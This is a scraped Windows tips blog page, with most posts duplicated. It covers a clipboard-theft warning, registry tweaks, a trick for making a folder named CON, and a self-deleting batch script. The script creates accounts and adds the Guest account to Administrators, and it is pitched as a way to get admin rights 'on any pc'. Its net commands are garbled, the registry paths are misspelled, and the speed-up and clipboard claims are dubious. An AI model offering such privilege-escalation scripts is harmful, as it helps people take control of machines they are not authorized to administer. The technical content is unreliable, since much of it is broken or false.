We do copy various data by ctrl+c for pasting elsewhere. This copied data is stored in clipboard and is accessible from the net by a combination of Javascripts and ASP.Just try this:
1) Copy any text by 'ctrl+c'
2) Do not keep sensitive data (like passwords, reditcard numbers, PIN etc.) in the clipboard while surfing the web. It is extremely easy to extract the text stored in the clipboard to steal your sensitive information.
To avoid Clipboard Hack Problem, do the following:
1) In Internet Explorer, Go to Tools -> Internet options -> Security
2) Press Custom level.
3) In the security settings, select disable under Allow paste operations via script and click on OK. (Now the contents of your clipboard are safe.)
Wednesday, March 31, 2010
Remove RUN ....
Who wants to delete "RUN"
I really don't know why someone could wish to remove RUN from START MENU, but if you're one of them, you can do that, too.
REGEDIT
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer
Double click on "NoRun" and change "ValueData" from 0 to 1.
Close Regedit, and restart computer.
I really don't know why someone could wish to remove RUN from START MENU, but if you're one of them, you can do that, too.
REGEDIT
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer
Double click on "NoRun" and change "ValueData" from 0 to 1.
Close Regedit, and restart computer.
TURN ON UR PC IN JUST 10 SECONDS
Alright so u wanna know how to turn the pc on in 10 seconds(may vary).Here's what u have to do to turn ur pc on in 10 seconds
Click on the start button then press R it will take u to Run well go to run
& type Regedit
press enter
this will open Registery Editor
now look for the key
HKEY_LOACAL_MECHINE\SYSTEM\CurrentControlSet\Control\
ContentIndex
now there find the Key Called
"Startup Delay"
Double Click On It
Now where its Base
Click Decimal
Now its Default Value Is 4800000(75300:hexadecimal)
Change The Value To 40000
here u go u have done it
now close the Registery Editor and Restart Your Computer
You'll See The Result
Click on the start button then press R it will take u to Run well go to run
& type Regedit
press enter
this will open Registery Editor
now look for the key
HKEY_LOACAL_MECHINE\SYSTEM\CurrentControlSet\Control\
ContentIndex
now there find the Key Called
"Startup Delay"
Double Click On It
Now where its Base
Click Decimal
Now its Default Value Is 4800000(75300:hexadecimal)
Change The Value To 40000
here u go u have done it
now close the Registery Editor and Restart Your Computer
You'll See The Result
Admin privileges for guest account in Windows
Want admin privileges on any pc in Guest account??
try this
Copy and paste the code given below in notepad and save it as anyname.bat(not txt)
Then double click on it
This will add u in administrators group
Enjoy.
CODE:-
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
try this
Copy and paste the code given below in notepad and save it as anyname.bat(not txt)
Then double click on it
This will add u in administrators group
Enjoy.
CODE:-
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Create Folder " CON " in Windows XP
Try to create a folder in Windows with either of these names--
"con" or "nul" or "Aux" or "Lpt1".Windows will not let u create ....
Reason: all this correspond to some of the famous ports
>con corresponds to the console
>Lpt1 corresponds to printer and so on....
HOWEVER I FOUND A TRICK TO CREAT FOLDER "CON"
Here is a simple method..........
Rename folder from the right click option........
Now press alt and press 255...
press 255 frm the right sideof the key bords i.e., num pad....
where only numbers r given.....
now write con and then press enter!!
you ll see a con folder in ur pc and also you can delete it easily.
"con" or "nul" or "Aux" or "Lpt1".Windows will not let u create ....
Reason: all this correspond to some of the famous ports
>con corresponds to the console
>Lpt1 corresponds to printer and so on....
HOWEVER I FOUND A TRICK TO CREAT FOLDER "CON"
Here is a simple method..........
Rename folder from the right click option........
Now press alt and press 255...
press 255 frm the right sideof the key bords i.e., num pad....
where only numbers r given.....
now write con and then press enter!!
you ll see a con folder in ur pc and also you can delete it easily.
Subscribe to:
Posts (Atom)